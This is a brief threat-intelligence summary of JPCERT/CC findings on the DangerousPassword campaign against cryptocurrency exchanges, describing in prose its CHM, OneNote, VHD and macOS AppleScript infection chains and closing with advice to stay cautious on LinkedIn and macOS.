Go to listing page

DangerousPassword Campaign: A Multi-Faceted Approach Exploiting Cryptocurrency Exchanges

DangerousPassword Campaign: A Multi-Faceted Approach Exploiting Cryptocurrency Exchanges
JPCERT/CC has observed threat actors targeting cryptocurrency exchanges in an attack campaign called DangerousPassword, also referred to as CryptoMimic or SnatchCrypto. Since June 2019, this campaign has been disseminating malware through email shortcuts. The attackers employ various techniques to infect their targets with malware, employing four distinct attack patterns, as discussed below.

Malicious CHM files from LinkedIn

Attackers use LinkedIn to send malware through compromised accounts disguised as job providers. 
  • The malware delivery involves a compressed RAR file containing a CHM file
  • Upon execution, the CHM file downloads and runs an external MSI file.
  • This MSI file deploys a PowerShell script, which, in turn, downloads and executes another MSI file (Administrator-a214051.msi). 
  • The second MSI file collects information from infected hosts and transmits it via an HTTP POST request in Base64 encoded format. 

The exact method employed by the attackers to compromise LinkedIn accounts remains unknown.

Leveraging OneNote files

In this technique, a OneNote file containing malware is employed, and the infection process is triggered as soon as the file is opened.
  • Within the OneNote file, a malicious MSI file is present, which installs and executes a DLL on the affected system. 
  • Additionally, the malware possesses the capability to detect specific antivirus software and adapt its actions accordingly. 
  • This includes employing techniques such as process hooking to NTDLL to avoid monitoring, modifying data in curl commands, and altering the method used to launch downloaded malware. 
  • These measures enhance the malware's ability to evade detection and compromise targeted systems.

Using virtual hard disk files

The DangerousPassword APT group has various methods for concealing malware, such as compressing it into ZIP or RAR formats, incorporating it into an ISO file, or embedding it within a VHD file. 
  • Within the VHD file, there are typically three components: a decoy PDF, the main malware in the form of a DLL file, and an executable (EXE) file used to initiate the DLL. 
  • The functionality of the DLL file is similar to the malware found in OneNote files, operating with malicious intent.

Targeting macOS

DangerousPassword has expanded its targeting to both Windows and macOS systems by leveraging an AppleScript technique. 
  • The AppleScript (main.scpt file) downloads and executes an unauthorized application using the curl command.
  • Once executed, the unauthorized application displays a window and employs XOR decoding to read the contents of files. 
  • It also connects to a C2 server and downloads a file based on the decoded instructions. 
  • This downloaded file is then executed on the compromised system.

The bottom line

DangerousPassword remains active in conducting targeted attacks against cryptocurrency exchanges in Japan. It is important to exercise caution while using social networking services, particularly LinkedIn, as the attackers may attempt to establish contact through this platform. Furthermore, it is worth noting that macOS users should also remain vigilant.
Cyware Publisher

Publisher

Cyware